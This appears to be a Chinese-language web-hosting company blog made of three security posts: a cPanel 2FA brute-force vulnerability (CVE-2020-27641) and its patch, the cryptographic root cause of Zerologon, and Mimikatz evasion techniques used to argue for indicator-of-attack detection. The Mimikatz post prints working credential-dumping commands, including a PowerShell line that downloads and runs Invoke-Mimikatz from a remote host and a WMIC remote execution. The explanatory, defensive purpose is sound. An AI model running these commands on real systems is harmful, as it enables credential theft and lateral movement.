您的主機商都完成更新了嗎?

捕夢網已完成更新cpanel主機，提供您最完整、最安全的主機!

cPanel 是安裝在Web hosting的軟體，安全漏洞存在，讓攻擊者以暴力攻擊手法繞過雙重身份驗證（2FA）核實保護；換句話說，該攻擊是針對使用cPanel＆Web Host Manager（WHM）軟體的 2FA 容易受到暴力攻擊，使攻擊者能夠猜測 URL 參數並繞過 2FA。

cPanel是通常安裝在shared Web hosting的管理軟體，它允許管理員和網站使用者使用圖形使用者介面自動執行伺服器和網站管理。

其網站上，cPanel聲稱目前被數多家主機代管商所使用，以管理全球超過7,000萬個網域。

發掘所需的有效身份驗證

資安公司Digital Defense的研究人員Michael Clark和Wes Wright發現了該漏洞，追踪為CVE-2020-27641。

攻擊者可能濫用CVE-2020-27641漏洞，在數百萬個網站上安裝cPanel的帳戶繞過2FA的身分驗證，原因為cPanel的安全政策未阻止攻擊者重複提交雙重身份驗證代碼。

研究人員說明: 當啟用MFA後且沒有進行任何鎖定或延遲來防止暴力攻擊時，啟用該功能的用戶可以提交任意數量的MFA (多重身份驗證) key。

這導致了此情況：攻擊者可以在數小時內繞過帳戶的MFA保護。我們也自己測試並顯示，通過對攻擊如進行更精細的調整，可以在幾分鐘內就完成攻擊。

攻擊者只能在發掘“所知或讀取有效身份驗證”的cpanel 帳戶並繞過雙重身份驗證（2FA）。

發布安全更新

cPanel已發布安全更新，已解決這些包含cPanel和WHM版本11.92.0.2、11.90.0.17和11.86.0.32中的漏洞，可通過軟體更新下載。

在更新的cPanel版本上，為了解決這個問題，該公司在cPHulk暴力保護服務中加入了速率限制檢查，如果2FA代碼驗證失敗，就會被視為登錄失敗。

該公司在發布CVE-2020-27641安全更新後上週表示：“沒有理由相信這些漏洞公布於眾。”

因此，cPanel目前僅會發布有限的漏洞訊息。

一旦有足夠的時間允許cPanel＆WHM系統將自動更新到新版本，cPanel將發布額外有關安全議題訊息。

捕夢網已更新cpanel 協助您的主機更安全無虞!!

參考更多捕夢網

文章參考處:

https://www.bleepingcomputer.com/news/security/cpanel-2fa-bypassed-in-minutes-via-brute-force-attacks/?fbclid=IwAR14_zcbDLgji35827ciolNWgnoTS6ugPWOqzKm-e-jMqlLqi27YG3HBcvQ

The post 您的主機商更新了沒？cPanel存在漏洞 first appeared on 捕夢網 Blog.

其實，微軟當時已經指出，此漏洞的CVSS 3.0風險達到滿分10分，並表示與網域控制器（Domain Controller）有關，不過，隨著研究人員的揭露，指出該漏洞可讓駭客輕易掌控AD網域，並解釋漏洞成因，不僅再次引發外界對此漏洞的重視，同時，相關的修補說明與警示也不斷成為新聞焦點。

這個已經使用多年的協定到底有何問題？我們根據首度揭露這項漏洞的資安公司Secura的資安報告，同時也請臺灣資安業者奧義智慧協助，深入說明這次漏洞的細節、根因與利用方式。

漏洞在Netlogon認證交握過程

關於這次Netlogon遠端協定漏洞的成因，我們先從協定運作原理開始說起。

簡單來說，Windows Netlogon遠端協定是一個RPC（Remote Procedure Call）介面，作用於AD網域控制器與Windows網域中電腦之間。舉例來說，以NTLM協定將使用者登入伺服器，就是它的功能之一，其他還包括讓網域內的電腦，以及網域控制器，可以相互驗證身分，特別是還可更新網域中電腦的密碼。

從原理來看，依據Windows Netlogon遠端協定，當用戶端（已加入網域的電腦）連至伺服器端（網域控制器）時，必須先經過認證交握（Authentication handshake）的過程。在此階段中，第一步驟是由用戶端開始，會先傳送一個Client Challenge，然後第二步驟是伺服器端也傳送回一個Server Challenge，此時，將透過一個金鑰衍生函式KDF（Key Derivation Function），以便相互確認彼此，並產生後續通訊都可用於驗證的Session Key。

第三步驟，同時也就是這次漏洞發生的地方。在用戶端通知產生Session Key時，該Session Key將包含secret與Challenge，secret是帳號密碼，並會將前述的Client Challenge加密，當傳送至伺服器端時，加密的結果就會被放入NetrServerAuthentication3的credential參數中，提供給Server進行確認。

一般而言，也就是在沒有漏洞的情況下，攻擊者在此情境中，由於不知道密碼，就無法計算出Session Key，也無法成功算出Client Credential。但是，攻擊者若是不知道Session Key，卻有辦法計算出Client Credential，等於成功繞過這裡的身分驗證。而這次的漏洞，就是這裡的加密過程中，沒有正確使用AES-CFB8加密模式而導致。

從軟體開發的角度來看，這次漏洞突顯了什麼樣的問題？是因為AES-CFB8不夠安全？還是軟體實作上出了什麼問題？

奧義智慧資深研究員陳仲寬的看法是，這個漏洞首先顯示出軟體在安全性及效能上的權衡。他認為，AES-CFB8是一個針對效能的變種演算法，雖常用於實務上，但並未仔細地接受理論上的分析驗證，儘管也沒有人證明其不安全。

而這個漏洞最主要的重點，就是沒有正確實作AES-CFB8加密模式，違反IV數值應為隨機數值。因為在此實作上，將AES-CFB8成立所需要的一項安全屬性- IV數值，寫死為一連串的0，造成當攻擊者將前述Client challenge同樣設定成一連串0時，造成連鎖效應，就有相當高的機率（1/256），導致得到的運算結果也是一連串0。

也因此，攻擊者能夠利用Zerologon漏洞偽造身分，與網域控制站溝通，並且有很高的機率，可以向伺服器端驗證自己的身分，之後，將能藉由Netlogon協定中內建的設定密碼功能，更改網域控制站的電腦帳號與密碼，再以DCSync等攻擊方式，進而控制整個網域。

對此，陳仲寬推測，實作此部分軟體的人，可能並不熟悉密碼學，也沒有深入去探討固定IV的風險，因此造成此次漏洞。他認為，即使是一般程式設計師，也需要有基本資安的概念。

資料來源: iThome 為何發生Zerologon漏洞？軟體實作不當 https://www.ithome.com.tw/news/140582

The post 為何發生Zerologon漏洞？軟體實作不當 first appeared on 捕夢網 Blog.

無論對手是誰，幾乎所有Windows入侵當中都能見到它的身影。這不僅僅是一種流行的憑證獲取方法，也是針對性攻擊者和滲透測試人員都常用的憑證獲取工具，因為這工具對於繞過基於特徵碼檢測的功能和有效性都十分強大。

攻擊者常會尋找有效憑證以提高許可權限，並擴大其在目標環境中的染指範圍，獲得有效憑證的方法也是八仙過海各顯神通，有些攻擊者甚至針對同一個目標都會採用多種憑證盜竊技術。

Mimikatz採用4種主要方式：

1. 修改可執行檔名稱
2. 運用批次檔
3. 採用PowerShell變種
4. 改變命令列選項

我們仔細分析一下。

1. 隱蔽：修改可執行檔名稱

攻擊者使用該工具最簡單直接的方法就是將其拷貝到被入侵的系統中，修改可執行檔的檔案名，用以下命令列啟動之：

c:\ProgramData\p.exe  “”privilege::debug””

“”sekurlsa::logonpasswords””

如此這般，系統的憑證資訊便落入了攻擊者手中。

2. 有效：使用批次檔

運用該工具的其他方式還包括採用批次檔將工具複製到目標系統執行，然後將結果輸出到一個檔，並將該輸出檔複製回中心收集點，最後再在目標系統上刪除所有相關檔。

3. 召喚力量支援：採用PowerShell變種

採用Mimikatz的PowerShell變種是又一種獲取目標系統憑證資訊的方法，比如：

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -Command ‘privilege::debug sekurlsa::logonpasswordsexit’

4. 改變命令列選項

2018年第四季度見證了Mimikatz工具的另類用法，尤其是修改命令列選項的一種：

mnl.exe pr::dg sl::lp et -p

該特殊的Mimikatz變種通過WMIC.exe對多個目標系統下手，比如：

Wmic  /NODE:”[REDACTED]” /USER:”[REDACTED]” /password:[REDACTED] process call create “cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt”

花招百出：需要全面的應對方法

這一系列有效戰術充分顯示出監測攻擊指標(IOA)的重要性。每種技術都是逃避脆弱檢測方法的嘗試，這些脆弱檢測方法要麼只檢測命令列選項以推斷其目的，要麼只檢查二進位檔案中有沒有出現相關字串。

攻擊者可以運用多種技術獲取憑證資訊，但公司企業需要一定程度的可見性以便防禦者能夠觀察到攻擊者所用的新技術，包括被特別用於繞過和顛覆檢測機制的那些。

攻擊指標(IOA)專注於攻擊技術的行為特徵，而不是像檔案名、散列值或單個命令列選項這樣的傳統入侵指標(IOC)。新一代IOA過程能賦予防禦者看清新攻擊技術的能力，即便攻擊者使用了專門的規避或顛覆檢測機制的方法。這是因為IOA著眼攻擊者的意圖，而萬變不離其宗，無論攻擊者使用哪種惡意軟體或漏洞利用程式，終歸逃不脫其惡意目的，只要盯緊攻擊意圖，攻擊便無所遁形。

網路取證領域中，IOC往往被描述為電腦上留存的指征網路安全被破壞的證據。在接到可疑事件通報，或是定期檢查，亦或發現網路中非正常呼出後，調查人員往往會去收集這些資料。理想狀況下，這些資訊被收集以後能夠創建更智慧的工具，可以檢測並隔離未來的可疑檔。因為IOC提供的是跟蹤壞人的反應式方法，當你發現IOC時，有極大的可能性已經被黑了。

此類IOC指征一系列惡意活動，從簡單的I/O操作到提權都有。注重行為特徵的IOA關聯則將這些指標都綜合到一起，用以檢測並防止惡意行為。其結果就是連通過反射注入PowerShell模組進行的憑證盜竊都能檢測出來的防禦技術，可以在攻擊者實際觀測到憑證前扼住該憑證盜取行為。

與基於特徵碼的殺毒軟體類似，基於IOC的檢測方法無法檢測無惡意軟體的威脅和零日漏洞攻擊。因此，公司企業紛紛轉向基於IOA的方法以便更好地適應其安全需求。

The post 簡單而粗暴：網路攻擊界的AK47 first appeared on 捕夢網 Blog.